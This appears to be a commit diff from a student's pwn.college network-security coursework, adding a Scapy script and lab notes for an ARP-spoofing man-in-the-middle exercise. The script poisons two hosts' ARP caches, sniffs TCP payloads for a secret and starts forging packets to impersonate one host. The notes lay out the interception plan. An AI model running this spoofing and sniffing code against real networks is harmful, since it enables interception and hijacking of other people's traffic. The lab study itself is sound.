almost done with project 3

3.14/scapy_mitm_arping.py

@@ -0,0 +1,142 @@
+import warnings
+from argparse import ArgumentParser
+from scapy.layers.l2 import Ether, ARP
+from scapy.layers.inet import IP, TCP
+from scapy.packet import Raw
+from scapy.arch import get_if_addr, get_if_hwaddr
+from scapy.sendrecv import srp1, sendp, sniff
+
+WHO_HAS = 1
+IS_AT = 2
+MAIN_IF = "eth0"
+
+main_if_mac = get_if_hwaddr(MAIN_IF)
+main_if_ip = get_if_addr(MAIN_IF)
+broadcast_mac = "ff:ff:ff:ff:ff:ff"
+
+target_1_ip = "10.0.0.3"
+target_2_ip = "10.0.0.4"
+
+target_1_mac = ""
+target_2_mac = ""
+
+prev_load = ""
+
+flag_mode = False
+
+
+def get_target_macs():
+    pkt_1 = Ether() / ARP()
+    pkt_1[Ether].src = main_if_mac
+    pkt_1[Ether].dst = broadcast_mac
+    pkt_1[ARP].op = WHO_HAS
+    pkt_1[ARP].hwsrc = main_if_mac
+    pkt_1[ARP].hwdst = broadcast_mac
+    pkt_1[ARP].psrc = main_if_ip
+    pkt_1[ARP].pdst = target_1_ip
+
+    pkt_2 = pkt_1.copy()
+    pkt_2[ARP].pdst = target_2_ip
+
+    ans_1 = srp1(pkt_1, iface=MAIN_IF)
+    ans_2 = srp1(pkt_2, iface=MAIN_IF)
+    target_1_mac = ans_1[ARP].hwsrc
+    target_2_mac = ans_2[ARP].hwsrc
+
+    return (target_1_mac, target_2_mac)
+
+
+def spoof_target(target_ip, target_mac, fake_ip):
+    # pretend that fake_ip is at main_if_mac
+    pkt = Ether() / ARP()
+    pkt[Ether].src = main_if_mac
+    pkt[Ether].dst = target_mac
+    pkt[ARP].op = IS_AT
+    pkt[ARP].hwsrc = main_if_mac
+    pkt[ARP].hwdst = target_mac
+    pkt[ARP].psrc = fake_ip
+    pkt[ARP].pdst = target_ip
+
+    sendp(pkt, iface=MAIN_IF)
+
+
+def handle_secret(secret, port, seq, ack):
+    global flag_mode
+    if not flag_mode:
+        print("Secret:", secret)
+        return
+    # masquerade as target_2 and talk to target_1
+    global target_1_mac
+    global target_2_mac
+    global target_1_ip
+    global target_2_ip
+    pkt = Ether() / IP() / TCP()
+    pkt[Ether].src = target_2_mac
+    pkt[Ether].dst = target_1_mac
+    pkt[IP].src = target_2_ip
+    pkt[IP].dst = target_1_ip
+    pkt[TCP].sport = port
+    pkt[TCP].dport = 31337  # target_1 always listens on this port
+    pkt[TCP].seq = seq
+    pkt[TCP].ack = ack
+    pkt[TCP].flags = 0x02  # SYN (???)
+    pkt.show()
+
+
+def packet_handler(pkt):
+    global prev_load
+    print(
+        str(pkt[IP].src) + ":" + str(pkt[TCP].sport),
+        ">",
+        str(pkt[IP].dst) + ":" + str(pkt[TCP].dport),
+    )
+    raw_load = pkt[Raw].load.decode("utf-8")
+    secret = ""
+    if raw_load != prev_load:
+        if prev_load.startswith("SECRET"):
+            secret = raw_load.strip()
+            handle_secret(
+                secret, port=pkt[TCP].sport, seq=pkt[TCP].seq, ack=pkt[TCP].ack
+            )
+        prev_load = raw_load
+    print(raw_load, end="")
+
+
+def capture_packets():
+    sniff(prn=packet_handler, iface=MAIN_IF, lfilter=lambda x: x.haslayer(Raw))
+
+
+if __name__ == "__main__":
+    parser = ArgumentParser()
+    parser.add_argument(
+        "-l", "--list-macs", required=False, dest="list_macs", action="store_true"
+    )
+    parser.add_argument(
+        "-s", "--arp-spoof", required=False, dest="arp_spoof", action="store_true"
+    )
+    parser.add_argument(
+        "-c", "--capture", required=False, dest="capture", action="store_true"
+    )
+    parser.add_argument(
+        "-i", "--infiltrate", required=False, dest="infiltrate", action="store_true"
+    )
+
+    args = parser.parse_args()
+    if args.arp_spoof and not args.list_macs:
+        args.list_macs = True
+        warnings.warn("Warning: spoofing needs MAC addresses, acquiring them first")
+
+    if args.infiltrate:
+        flag_mode = True
+
+    if args.list_macs:
+        target_1_mac, target_2_mac = get_target_macs()
+        print(target_1_ip + " is at " + target_1_mac)
+        print(target_2_ip + " is at " + target_2_mac)
+
+    if args.arp_spoof:
+        spoof_target(target_1_ip, target_1_mac, target_2_ip)
+        spoof_target(target_2_ip, target_2_mac, target_1_ip)
+
+    if args.capture:
+        capture_packets()

Dojo Notes.md

@@ -1,4 +1,4 @@
-# CSE 545 pwn.college Dojo
+# CSE 545 - Fall '24 pwn.college Dojo
 
 ## Project 01 Linux Lifter
 
@@ -61,7 +61,7 @@
 
 - mangling is adding 3 then xor with 2. so just xor with 2, then subtract 3
 
-#### lab 2a.02
+### lab 2a.02
 
 ![lab code snippet](ss2.png)
 
@@ -203,6 +203,8 @@ nc 10.0.0.142 31337
 - craft Ether packet to given dest addr with type `0xFFFF`
 - `srp(pkt, iface='eth0')`
 
+### lab 3a was chill, no notes
+
 ### .09 - IP scapy
 
 - similar
@@ -226,3 +228,30 @@ nc 10.0.0.142 31337
 - send ACK with next syn and ack numbers
 
 ### .12 - ARP scapy
+
+- meh, arp opcode is 2
+
+### .13 - ARP spoofing
+
+- meh, just crafting ARP and tcpdump
+
+### lab 3b was chill, no notes
+
+### .14 - MiTM ARPing
+
+- shit's getting too easy, let's not look at /challenge/run
+- first, get target's macs, then arp spoof
+- we don't have NET_ADMIN, so can't set ip_forward in sysctl to control MITM directly,
+- first, capture packets, check raw loads
+- we observe that a sequence repeats:
+  - 10.0.0.3:31337 sends a command: "SECRET", to 10.0.0.4 at a random port
+    - note: how does 3 know which port to send to?
+  - 4 responds with a secret, it's in ascii?
+  - 3 sends a list of available (?) commands - echo, flag, and then asks for a command
+  - 4 responds with echo, and sends "Hello, World!"
+  - 3 echoes it back
+- connection closes, repeats with another randomized port for 4
+- note that 3 sends a secret and a list of commands that includes a flag command
+- craft a packet masquerading as 4, with the flag command, wait for a secret to arrive and put it in the packet
+- in the time it takes 3 to do the legitimate echo from 4, we could probably send the flag command to 3 and have it processed in the same ephemeral connection
+- let's try